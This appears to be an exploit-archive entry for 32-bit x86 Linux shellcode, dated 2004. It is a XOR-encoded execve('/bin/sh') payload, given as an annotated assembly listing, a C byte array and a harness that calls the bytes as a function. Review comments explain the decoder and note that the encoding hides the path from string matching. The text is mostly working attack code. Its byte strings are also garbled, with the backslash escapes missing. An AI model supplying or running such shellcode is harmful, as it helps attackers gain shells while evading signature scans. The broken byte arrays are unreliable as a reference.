
# Title : linux/x86 execve /bin/sh xor encrypted 55 bytes
# Published : 2004-09-12
# Author : n/a


/*
# Listing (GAS, AT&T syntax, 32-bit x86 Linux) of the payload stored in code[].
# Flow: a jmp/call/pop sequence obtains the address of the trailing data,
# two dwords of that data are XORed in place with a key stored right after
# them, and the decoded string is then passed to the int $0x80 system call
# with eax = 0xb (execve on i386 Linux), followed by eax = 1 (exit).
# Review notes:
#  - The decoder writes into its own image (the two xor-to-memory lines),
#    so it only runs from memory that is both writable and executable;
#    W^X / NX mappings stop it at that point.
#  - The path string is not present in clear in the static bytes, so a
#    plain string match on the payload will not find it; the system call
#    itself is still visible to runtime monitoring.
.file "xor-encrypted shellcode"
.version "1.0"
.text
	.align 4
# NOTE(review): the two directives below export and type `main`, but the
# only label this listing defines is `_start`.
.globl main
	.type main,@function
_start:
	# eax = 0, so the later write to %al leaves the full register at 0xb.
	xorl	%eax,%eax
	# Forward jump to the call at the end. The operand is the relative
	# displacement from the byte encoding (eb 22), not an absolute address.
	jmp    	0x22
	# ebx = return address pushed by the call = address of the data bytes.
	popl   	%ebx	
	# edx = dword at data+8: the XOR key (0x41 repeated, per the byte array).
	movl	8(%ebx),%edx
	# Decode data bytes 0-3 and 4-7 in place; byte 7 (0x41) becomes the
	# terminating zero of the string.
	xor	%edx,(%ebx)
	xor	%edx,4(%ebx)
	# edx = 0: used as the NULL below and as the third system-call argument.
	xor	%edx,%edx
	# Build a two-entry pointer array on the stack: { data, NULL }.
	movl   	%ebx,0x8(%esp)
	movl   	%edx,0xc(%esp)
	# eax = 0xb (execve); ebx = path, ecx = pointer array, edx = NULL.
	movb   	$0xb,%al
	leal   	0x8(%esp),%ecx
	int    	$0x80
	# Reached only if the call above returns: eax = 1 (exit), ebx = 0.
	xorl   	%ebx,%ebx
	movl   	%ebx,%eax
	incl   	%eax
	int   	$0x80
	# Backward call to the popl; pushes the address of the data that follows.
	# Operand is again the relative displacement (e8 d9 ff ff ff = -0x27).
	call	-0x27
	# Encoded data: 8 bytes that decode to the path string, then the 4-byte key.
	# NOTE(review): the backslashes of the \x escapes are missing on this
	# page, presumably lost in extraction.
	.string "x6ex23x28x2fx6ex32x29x41x41x41x41x41"
*/

#define NAME "encrypted"

char code[]=
"x31xc0xebx22x5bx8bx53x08x31x13x31x53x04x31xd2x89"
"x5cx24x08x89x54x24x0cxb0x0bx8dx4cx24x08xcdx80x31"
"xdbx89xd8x40xcdx80xe8xd9xffxffxff"
"x6ex23x28x2fx6ex32x29x41" /* encrypted "/bin/sh" */
"x41x41x41x41";     /* Conversion chars */

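/*
 * Test harness: prints the payload label and its size, then calls the bytes
 * in `code` as if they were a function.
 *
 * Changes from the page's version:
 *  - explicit `int main(void)` and an explicit return value instead of
 *    implicit int and falling off the end;
 *  - the size comes from sizeof, which counts every byte of the literal
 *    (minus the terminator the compiler appends), so it stays correct for a
 *    payload containing a zero byte and needs no strlen declaration;
 *  - the escape backslashes of the format string, missing on the page, are
 *    restored.
 *
 * `code` is an ordinary writable data array. Where data pages are mapped
 * non-executable (NX/DEP), the indirect call below faults instead of
 * running the payload.
 *
 * NOTE(review): this listing has no #include <stdio.h>, so printf is
 * implicitly declared here, which C99 and later compilers reject or warn on.
 */
int main(void)
{
  /* View the data array as a function taking no arguments. */
  int (*funct)(void) = (int (*)(void)) code;

  printf("%s shellcode\n\tSize = %d\n", NAME, (int)(sizeof(code) - 1));

  /* Control is not expected to come back: the payload ends in an exit call. */
  funct();
  return 0;
}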
